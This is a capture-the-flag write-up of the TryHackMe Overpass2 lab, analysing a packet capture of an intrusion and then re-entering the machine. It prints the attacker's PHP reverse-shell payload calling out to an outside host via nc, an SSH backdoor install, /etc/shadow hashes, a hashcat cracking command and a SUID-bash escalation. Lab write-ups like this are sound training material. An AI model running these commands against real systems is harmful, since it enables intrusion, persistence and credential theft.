TryHackMe Ovrpass2 writeup

TryHackMe Ovrpass2 writeup

Overpass2 is the seventh machine in the “Advanced Exploitation” part of TryHackMe’s “Offensive pentesting” path.

PCAP analysis

That is an unusual type of machine for me. We got the .pcap file with the network dump.

There are few ways to work with .pcap files.

If you work with .pcap files occasionally, you are probably using the Wireshark.

Download the .pcap file to your system and open it with Wireshark.

It might look overwhelming, but it not so hard to get used to it after all.

If you never worked with .pcap files before - it is a format for capturing the network traffic. The first packets will be placed at the top, and you can scroll down the main window to see other packets.

One of the main features of the Wireshark is the ability to follow streams. That will transform the content of the file into a more readable format.

Wireshark has tons of features, you should explore it!

The interesting part for us started from the POST request to the /development/upload.php page. You can use the Follow HTTP stream feature to read details.

We can find this command in the body of the POST request:

<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>

The attacker is spawning the reverse shell to the IP address 192.168.170.145 on the port 4242.

We can also notice that the attacker is using nc as a communication point, and we know that nc transferring all data as a clear text. That means we will be able to read everything that happened on the machine, including all commands, provided passwords, etc.

You can scroll the dump a bit and follow another stream started from packet number 32. It’s a TCP packet, so you can use the Follow TCP Stream feature of the Wireshark.

/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty;pty.spawn("/bin/bash")'

The first thing that the attacker did - upgrade the shell to Fully Interactive TTY with python.

The next thing that we can use later is the password for user james right in the stream (it was transferred in a clear text, remember?).

james@overpass-production:~$ sudo -l
sudo -l
[sudo] password for james: whenevernoteartinstant

User james may run the following commands on overpass-production:
    (ALL : ALL) ALL

We can also see that the attacker has the dump of /etc/shadow

james@overpass-production:~$ sudo cat /etc/shadow

james:$6$7GS5e.yv$HqIH5MthpGWpczr3MnwDHlED8gbVSHt7ma8yxzBM8LuBReDV5e1Pu/VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/:18464:0:99999:7:::
paradox:$6$oRXQu43X$WaAj3Z/4sEPV1mJdHsyJkIZm1rjjnNxrY5c8GElJIjG7u36xSgMGwKA2woDIFudtyqY37YCyukiHJPhi4IU7H0:18464:0:99999:7:::
szymex:$6$B.EnuXiO$f/u00HosZIO3UQCEJplazoQtH8WJjSX/ooBjwmYfEOTcqCAlMjeFIgYWqR5Aj2vsfRyf6x1wXxKitcPUjcXlX/:18464:0:99999:7:::
bee:$6$.SqHrp6z$B4rWPi0Hkj0gbQMFujz1KHVs9VrSFu7AU9CxWrZV7GzH05tYPL1xRzUJlFHbyp0K9TAeY1M6niFseB9VLBWSo0:18464:0:99999:7:::
muirland:$6$SWybS8o2$9diveQinxy8PJQnGQQWbTNKeb2AiSp.i8KznuAjYbqI3q04Rf5hjHPer3weiC.2MrOj2o1Sw/fd2cu0kC6dUP.:18464:0:99999:7:::

Feel free to crack those hashes! wink

The attacker also established a ssh backdoor:

james@overpass-production:~$ git clone https://github.com/NinjaJc01/ssh-backdoor

james@overpass-production:~/ssh-backdoor$ ./backdoor -a 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed

That’s all we need to know.


Analyze the code

It’s a good idea to clone the repo and look around.

The file main.go contains the original hash for the backdoor and hardcoded salt.

From the .pcap file we know that the attacker used 6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed hash, and from the repo we know that hardcoded salt is 1c362db832f3f864c8c2fe05f2002a05. Now you can combine it in the format hash:salt, and crack it!

The syntax for hashcat, for instance. You can use other tools if you want.

hashcat -m 1710 -a 0 -o password.txt hash.txt /usr/share/wordlists/rockyou.txt

Get back in!

Now we have everything that might be needed to exploit the machine one more time.

As we already know all details about the backdoor, so we can use it as a shortcut and not re-exploit the machine from the scratch.

Note that ssh is running not on default port 22.

ssh -p 2222 james@10.10.147.82

Use the password that you just cracked to login.


PrivEsc

Privilege escalation is simple this time.

Let’s look around:

james@overpass-production:/home/james$ ls -la

total 1136
drwxr-xr-x 7 james james    4096 Jul 22 03:40 .
drwxr-xr-x 7 root  root     4096 Jul 21 18:08 ..
lrwxrwxrwx 1 james james       9 Jul 21 18:14 .bash_history -> /dev/null
-rw-r--r-- 1 james james     220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 james james    3771 Apr  4  2018 .bashrc
drwx------ 2 james james    4096 Jul 21 00:36 .cache
drwx------ 3 james james    4096 Jul 21 00:36 .gnupg
drwxrwxr-x 3 james james    4096 Jul 22 03:35 .local
-rw------- 1 james james      51 Jul 21 17:45 .overpass
-rw-r--r-- 1 james james     807 Apr  4  2018 .profile
-rw-r--r-- 1 james james       0 Jul 21 00:37 .sudo_as_admin_successful
-rwsr-sr-x 1 root  root  1113504 Jul 22 02:57 .suid_bash
drwxrwxr-x 3 james james    4096 Jul 22 03:35 ssh-backdoor
-rw-rw-r-- 1 james james      38 Jul 22 03:40 user.txt
drwxrwxr-x 7 james james    4096 Jul 21 01:37 www

There is a hidden .suid_bash binary with the SUID bit!

You can run it in order to get root, but keep in mind that you will need to specify the -p flag to allow the SUID bit to affect your privileges.

james@overpass-production:/home/james$ ./.suid_bash -p
.suid_bash-4.4# whoami
root

Takeaway

  • The ability to analyze dumps and logs can be priceless

  • The whole process of going through this machine is like reading a writeup, you can learn a lot from it.